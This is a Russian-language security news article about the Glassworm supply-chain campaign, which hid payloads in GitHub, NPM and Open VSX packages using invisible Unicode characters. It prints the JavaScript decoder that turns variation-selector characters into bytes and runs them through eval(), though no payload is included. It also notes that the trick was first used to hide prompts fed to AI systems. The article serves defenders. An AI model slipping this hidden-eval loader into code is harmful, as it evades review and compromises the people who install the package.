Атака на цепочку поставок использует невидимые символы Юникода для обхода обнаружения.

Специалисты по безопасности из Aikido Security обнаружили атаку на цепочку поставок, использующую невидимые символы Юникода для сокрытия вредоносных функций в пакетах, загруженных на GitHub, NPM и Open VSX. Группа атакующих, получившая название Glassworm, загрузила 151 вредоносный пакет на GitHub с 3 по 9 марта 2026 года.
Как работает невидимый код
Вредоносные пакеты используют символы Юникода из областей публичного использования (также называемых публичным доступом), которые невидимы при просмотре в редакторах, терминалах и интерфейсах проверки кода. Хотя большая часть кода выглядит нормально, вредоносные функции и полезные нагрузки отображаются с помощью этих невидимых символов, что делает ручную проверку кода и традиционные средства защиты неэффективными.
Невидимые символы Юникода представляют каждую букву американского алфавита при обработке компьютерами, но отображаются как пробелы или пустые строки для людей. Интерпретаторы JavaScript могут читать и выполнять эти символы как обычный код.
Техническая реализация
В одном проанализированном пакете злоумышленники закодировали вредоносную полезную нагрузку с использованием невидимых символов. Код включает функцию декодера, которая извлекает скрытые байты и передает их в eval():
const s = v => [...v].map(
w => (
w = w.codePointAt(0),
w >= 0xFE00 && w <= 0xFE0F ? w - 0xFE00 :
w >= 0xE0100 && w <= 0xE01EF ? w - 0xE0100 + 16 :
null
)
).filter(n => n !== null);
eval(Buffer.from(s(``)).toString('utf-8'));
Строка с обратными кавычками, передаваемая в s(), выглядит пустой в средствах просмотра, но содержит невидимые символы, которые декодируются в полную вредоносную полезную нагрузку. В предыдущих инцидентах декодированные полезные нагрузки получали и выполняли скрипты второй стадии, используя Solana в качестве канала доставки для кражи токенов, учетных данных и секретов.
Характеристики атаки
Вредоносные пакеты особенно трудно обнаружить, потому что:
- Видимые части кода отличаются высоким качеством и реалистичностью
- Сопутствующие изменения включают корректировки документации, обновления версий, небольшие рефакторинги и исправления ошибок
- Изменения стилистически соответствуют целевым проектам
- Исследователи подозревают, что для создания убедительно легитимных пакетов используются языковые модели (LLM)
Эта техника с использованием Юникода впервые была применена в 2024 году для сокрытия вредоносных промптов, подаваемых в ИИ-движки, а затем адаптирована для традиционных атак с вредоносным ПО. Обнаруженные 151 пакет, вероятно, представляют лишь небольшую часть кампании, так как многие из них были удалены после первоначальной загрузки.
📖 Read the full source: HN AI Agents
👀 Смотрите также

Исследователи Университета Торонто продемонстрировали ИИ-червя, работающего на бесплатных моделях с открытым весом
Исследователи из Университета Торонто продемонстрировали первого ИИ-червя, который адаптирует свою стратегию распространения с помощью общедоступных моделей с открытым весом, нацеливаясь на любое онлайн-устройство.

Пять основных шагов по обеспечению безопасности для экземпляров OpenClaw
В посте на Reddit предупреждают, что запуск OpenClaw с настройками по умолчанию создаёт серьёзные риски безопасности, и предлагают пять немедленных действий: сменить порт по умолчанию, использовать Tailscale для приватного доступа, настроить брандмауэр, создать отдельные учётные записи для агента и проверять навыки перед установкой.

Анализ инструментирования и возможностей телеметрии Claude Code
Анализ исходного кода показывает, что Claude Code реализует обширное отслеживание поведения, включая классификацию настроений на основе ключевых слов, мониторинг колебаний при запросах разрешений и детальное снятие отпечатков окружения.

Клод Код обнаружил бэкдор вредоносного ПО в репозитории GitHub во время технического аудита
Разработчик использовал Claude Code для аудита репозитория GitHub перед выполнением и обнаружил бэкдор удаленного выполнения кода в src/server/routes/auth.js, который мог бы скомпрометировать его компьютер. В запросе требовался технический аудит due diligence для проверки полноты проекта, AI/ML-слоя, базы данных, аутентификации, бэкенд-сервисов, фронтенда, качества кода и оценки трудозатрат.